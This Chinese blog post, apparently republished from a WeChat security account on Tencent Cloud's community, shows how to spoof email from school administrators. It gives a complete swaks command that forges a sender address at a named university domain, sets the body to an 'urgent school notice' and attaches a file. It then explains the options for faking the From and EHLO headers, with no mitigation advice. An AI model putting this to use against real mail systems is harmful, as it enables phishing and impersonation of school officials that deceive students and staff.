首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >伪装成学校管理员发邮件?9成学校都存在

伪装成学校管理员发邮件?9成学校都存在

作者头像
网e渗透安全部
发布2025-11-12 14:24:31
发布2025-11-12 14:24:31
890
举报
文章被收录于专栏:白安全组白安全组

大多数学校的邮箱都可以使用代发服务(经过测试,绝大多数学校都存在这种问题)

使用方式,我们使用kali Linux中的swaks工具

目前接收邮件的测试邮箱163邮箱,qq邮箱因为安全限制问题无法接收到

具体命令:

代码语言:javascript
复制
swaks --body "学校紧急通知" --header "Subject:教务处" -t baianquanzu@163.com -f admin@nuist.edu.cn --attach post.txt

body参数是发送过去邮件的内容

header是发送过去邮件的标题

-t是我们的目标邮箱

-f是发送者的邮箱

--attach是指定要附加的文件的路径

详细参数介绍

--from <要显示的发件人邮箱>

--ehlo <伪造的邮件ehlo头>

--body <邮件正文>

--header <邮件头信息,subject为邮件标题>

--data <源邮件>

可以看到上放的发件人是学校的邮箱,标题等,根据我们对目标的需求进行伪造,只不过下方的附件会被统一变成一个网易邮箱的文件b

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-11-10,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 详细参数介绍
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档